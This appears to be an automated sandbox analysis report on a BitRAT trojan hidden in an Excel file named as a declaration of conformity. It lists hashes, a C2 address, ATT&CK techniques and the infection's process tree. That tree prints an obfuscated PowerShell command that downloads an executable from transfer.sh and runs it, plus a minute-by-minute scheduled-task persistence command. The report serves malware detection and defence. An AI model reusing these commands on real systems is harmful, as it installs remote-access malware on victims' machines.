bitrat | 4a7daa6f01efcbc7e6480e26f2f99092eb7c059929bc84debd13a7962d0a2a25

Analysis

max time kernel
151s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20230831-en
resource tags

arch:x64arch:x86image:win10v2004-20230831-enlocale:en-usos:windows10-2004-x64system
submitted
14-09-2023 15:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Declaration_of_conformity_INOX_MACEL_ITALY_09_2023.xls
Size

100KB
MD5

100a2750f01f084234fbd828f1f608fc
SHA1

e5c947d03ad2a7a08500275b2107d91f13295066
SHA256

4a7daa6f01efcbc7e6480e26f2f99092eb7c059929bc84debd13a7962d0a2a25
SHA512

cf3e7cc272d565722e1f522e038925e8416863994facd1d206695f46178792c7b9f7c87b2b878d1845d7208ff1647158d3980a7268c53be39b98eac354681f8f
SSDEEP

3072:YrxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAPtJE2zuxq+fr9wBLa71ba2ryLTHeYjc:exEtjPOtioVjDGUU1qfDlavx+W2QnAF9

Score

10^/10

bitrat trojan

Malware Config

Extracted

Family

bitrat

Version

1.38

185.225.75.68:3569

Attributes

communication_password
0edcbe7d888380c49e7d1dcf67b6ea6e
tor_process
tor

Signatures

BitRAT
BitRAT is a remote access tool written in C++ and uses leaked source code from other families.
trojan bitrat

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1372	3720	cmd.exe	EXCEL.EXE

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

43 4544 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 5 IoCs

Processes:

kzcnu.exekzcnu.exepint.exepint.exepint.exe

pid process

2916 kzcnu.exe
1424 kzcnu.exe
3724 pint.exe
2100 pint.exe
680 pint.exe
Suspicious use of SetThreadContext 2 IoCs

Processes:

kzcnu.exepint.exe

description pid process target process

PID 2916 set thread context of 1424 2916 kzcnu.exe kzcnu.exe
PID 3724 set thread context of 2100 3724 pint.exe pint.exe
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

2436 1424 WerFault.exe kzcnu.exe
2096 2100 WerFault.exe pint.exe

flow	pid	process
43	4544	powershell.exe

pid	process
2916	kzcnu.exe
1424	kzcnu.exe
3724	pint.exe
2100	pint.exe
680	pint.exe

description	pid	process	target process
PID 2916 set thread context of 1424	2916	kzcnu.exe	kzcnu.exe
PID 3724 set thread context of 2100	3724	pint.exe	pint.exe

pid	pid_target	process	target process
2436	1424	WerFault.exe	kzcnu.exe
2096	2100	WerFault.exe	pint.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4008 schtasks.exe
1640 schtasks.exe

pid	process
4008	schtasks.exe
1640	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

3720 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

4544 powershell.exe
4544 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 4544 powershell.exe
Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

EXCEL.EXE

pid process

3720 EXCEL.EXE
3720 EXCEL.EXE

pid	process
4544	powershell.exe
4544	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4544	powershell.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

EXCEL.EXE

pid	process
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE
3720	EXCEL.EXE

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exekzcnu.execmd.exepint.execmd.exe

description	pid	process	target process
PID 3720 wrote to memory of 1372	3720	EXCEL.EXE	cmd.exe
PID 3720 wrote to memory of 1372	3720	EXCEL.EXE	cmd.exe
PID 1372 wrote to memory of 4544	1372	cmd.exe	powershell.exe
PID 1372 wrote to memory of 4544	1372	cmd.exe	powershell.exe
PID 4544 wrote to memory of 2916	4544	powershell.exe	kzcnu.exe
PID 4544 wrote to memory of 2916	4544	powershell.exe	kzcnu.exe
PID 4544 wrote to memory of 2916	4544	powershell.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1424	2916	kzcnu.exe	kzcnu.exe
PID 2916 wrote to memory of 1532	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 1532	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 1532	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 3592	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 3592	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 3592	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 1368	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 1368	2916	kzcnu.exe	cmd.exe
PID 2916 wrote to memory of 1368	2916	kzcnu.exe	cmd.exe
PID 3592 wrote to memory of 4008	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 4008	3592	cmd.exe	schtasks.exe
PID 3592 wrote to memory of 4008	3592	cmd.exe	schtasks.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 2100	3724	pint.exe	pint.exe
PID 3724 wrote to memory of 3520	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 3520	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 3520	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 3984	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 3984	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 3984	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 1608	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 1608	3724	pint.exe	cmd.exe
PID 3724 wrote to memory of 1608	3724	pint.exe	cmd.exe
PID 3984 wrote to memory of 1640	3984	cmd.exe	schtasks.exe
PID 3984 wrote to memory of 1640	3984	cmd.exe	schtasks.exe
PID 3984 wrote to memory of 1640	3984	cmd.exe	schtasks.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Declaration_of_conformity_INOX_MACEL_ITALY_09_2023.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3720

C:\Windows\SYSTEM32\cmd.exe
cmd /c pow^ers^hell/W 01 c^u^rl htt^ps://transfer.sh/get/gj04sqKk7O/boat.e^xe -o C:\Users\Public\kzcnu.exe;C:\Users\Public\kzcnu.exe
2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1372

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell /W 01 curl https://transfer.sh/get/gj04sqKk7O/boat.exe -o C:\Users\Public\kzcnu.exe;C:\Users\Public\kzcnu.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4544

C:\Users\Public\kzcnu.exe
"C:\Users\Public\kzcnu.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2916

C:\Users\Public\kzcnu.exe
"C:\Users\Public\kzcnu.exe"
5⤵
- Executes dropped EXE
PID:1424

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 188
6⤵
- Program crash
PID:2436

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
5⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Public\kzcnu.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
5⤵
PID:1368

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
5⤵
- Suspicious use of WriteProcessMemory
PID:3592

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
6⤵
- Creates scheduled task(s)
PID:4008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1424 -ip 1424
1⤵
PID:764

C:\Users\Admin\AppData\Roaming\pint\pint.exe
C:\Users\Admin\AppData\Roaming\pint\pint.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3724

C:\Users\Admin\AppData\Roaming\pint\pint.exe
"C:\Users\Admin\AppData\Roaming\pint\pint.exe"
2⤵
- Executes dropped EXE
PID:2100

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2100 -s 188
3⤵
- Program crash
PID:2096

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
2⤵
PID:3520

C:\Windows\SysWOW64\cmd.exe
"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:3984

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\pint\pint.exe'" /f
3⤵
- Creates scheduled task(s)
PID:1640

C:\Windows\SysWOW64\cmd.exe
"cmd" /c copy "C:\Users\Admin\AppData\Roaming\pint\pint.exe" "C:\Users\Admin\AppData\Roaming\pint\pint.exe"
2⤵
PID:1608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 2100 -ip 2100
1⤵
PID:3388

C:\Users\Admin\AppData\Roaming\pint\pint.exe
C:\Users\Admin\AppData\Roaming\pint\pint.exe
1⤵
- Executes dropped EXE
PID:680

C:\Users\Admin\AppData\Roaming\pint\pint.exe
"C:\Users\Admin\AppData\Roaming\pint\pint.exe"
2⤵
PID:4004

C:\Windows\SysWOW64\cmd.exe
"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\pint"
2⤵
PID:2216

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pint.exe.log
Filesize
520B

MD5
03febbff58da1d3318c31657d89c8542

SHA1
c9e017bd9d0a4fe533795b227c855935d86c2092

SHA256
5164770a37b199a79ccd23b399bb3309228973d9f74c589bc2623dc613b37ac4

SHA512
3750c372bbca1892e9c1b34681d592c693e725a8b149c3d6938079cd467628cec42c4293b0d886b57a786abf45f5e7229247b3445001774e3e793ff5a3accfa3

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vsoeeczq.fjj.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\pint\pint.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Admin\AppData\Roaming\pint\pint.exe
Filesize
271KB

MD5
0f2e38be4e4d3b2a75782af840991bd5

SHA1
7f070d1a23070b144646f2cf739d383e0bd45744

SHA256
0318a206c2b47cac168217a87ce0e813746522add67efa25e578c6b6713437c8

SHA512
63a1e8e434ed56451a18e4cc27a2c2a63d010147738cb19192c2c1a17113d1a71baf347c2132408fe9eafd7ffe51ef4df037cb019fbd0d0f58738efbb3b5b510

Download Submit
C:\Users\Admin\AppData\Roaming\pint\pint.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Admin\AppData\Roaming\pint\pint.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Admin\AppData\Roaming\pint\pint.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Admin\AppData\Roaming\pint\pint.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Public\kzcnu.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Public\kzcnu.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
C:\Users\Public\kzcnu.exe
Filesize
3.8MB

MD5
6d4c3a4ff3637ec34f820172f897d476

SHA1
d53fe8f0ecb0536088ec9be5247ab6627baf31cb

SHA256
c609d25041b7c463a726027c99c0a264b1e77415612e445fc39cfc9aae9801f3

SHA512
1ff5f4b215bedf6824c9c1932b5e8dbcbb8e459ee2839c598cc0f955b2948e25c5ce834b963ee1cf6ea22954e9c1fa4b102f117808f6dc8a4891b36c37d7e894

Download Submit
memory/680-123-0x00000000750C0000-0x0000000075870000-memory.dmp

Filesize
7.7MB

Download
memory/680-124-0x00000000051D0000-0x00000000051E0000-memory.dmp

Filesize
64KB

Download
memory/1424-72-0x0000000000A10000-0x0000000000DDE000-memory.dmp

Filesize
3.8MB

Download
memory/1424-80-0x0000000000A10000-0x0000000000DDE000-memory.dmp

Filesize
3.8MB

Download
memory/1424-76-0x0000000000A10000-0x0000000000DDE000-memory.dmp

Filesize
3.8MB

Download
memory/2100-100-0x0000000000F00000-0x00000000012CE000-memory.dmp

Filesize
3.8MB

Download
memory/2100-96-0x0000000000F00000-0x00000000012CE000-memory.dmp

Filesize
3.8MB

Download
memory/2916-67-0x0000000075020000-0x00000000757D0000-memory.dmp

Filesize
7.7MB

Download
memory/2916-84-0x0000000075020000-0x00000000757D0000-memory.dmp

Filesize
7.7MB

Download
memory/2916-70-0x0000000005040000-0x0000000005050000-memory.dmp

Filesize
64KB

Download
memory/2916-69-0x0000000005600000-0x0000000005BA4000-memory.dmp

Filesize
5.6MB

Download
memory/2916-68-0x00000000002B0000-0x0000000000688000-memory.dmp

Filesize
3.8MB

Download
memory/3720-32-0x0000016891600000-0x0000016891E00000-memory.dmp

Filesize
8.0MB

Download
memory/3720-23-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-14-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-13-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-2-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-10-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-12-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-11-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-50-0x0000016891600000-0x0000016891E00000-memory.dmp

Filesize
8.0MB

Download
memory/3720-51-0x0000016891600000-0x0000016891E00000-memory.dmp

Filesize
8.0MB

Download
memory/3720-52-0x0000016891600000-0x0000016891E00000-memory.dmp

Filesize
8.0MB

Download
memory/3720-9-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-120-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-119-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-118-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-3-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-8-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-117-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-28-0x0000016891600000-0x0000016891E00000-memory.dmp

Filesize
8.0MB

Download
memory/3720-31-0x0000016891600000-0x0000016891E00000-memory.dmp

Filesize
8.0MB

Download
memory/3720-22-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-21-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-6-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-114-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-20-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-19-0x00007FF82D5B0000-0x00007FF82D5C0000-memory.dmp

Filesize
64KB

Download
memory/3720-7-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-17-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-5-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-4-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-1-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-115-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-0-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-16-0x00007FF86F810000-0x00007FF86FA05000-memory.dmp

Filesize
2.0MB

Download
memory/3720-15-0x00007FF82D5B0000-0x00007FF82D5C0000-memory.dmp

Filesize
64KB

Download
memory/3720-116-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3720-113-0x00007FF82F890000-0x00007FF82F8A0000-memory.dmp

Filesize
64KB

Download
memory/3724-88-0x0000000075020000-0x00000000757D0000-memory.dmp

Filesize
7.7MB

Download
memory/3724-102-0x0000000075020000-0x00000000757D0000-memory.dmp

Filesize
7.7MB

Download
memory/3724-89-0x00000000053E0000-0x00000000053F0000-memory.dmp

Filesize
64KB

Download
memory/4544-66-0x00007FF846D50000-0x00007FF847811000-memory.dmp

Filesize
10.8MB

Download
memory/4544-58-0x000001E5ED660000-0x000001E5ED670000-memory.dmp

Filesize
64KB

Download
memory/4544-55-0x000001E5ED660000-0x000001E5ED670000-memory.dmp

Filesize
64KB

Download
memory/4544-54-0x000001E5ED660000-0x000001E5ED670000-memory.dmp

Filesize
64KB

Download
memory/4544-53-0x00007FF846D50000-0x00007FF847811000-memory.dmp

Filesize
10.8MB

Download
memory/4544-45-0x000001E5ED660000-0x000001E5ED670000-memory.dmp

Filesize
64KB

Download
memory/4544-44-0x000001E5ED660000-0x000001E5ED670000-memory.dmp

Filesize
64KB

Download
memory/4544-43-0x00007FF846D50000-0x00007FF847811000-memory.dmp

Filesize
10.8MB

Download
memory/4544-39-0x000001E5ED870000-0x000001E5ED892000-memory.dmp

Filesize
136KB

Download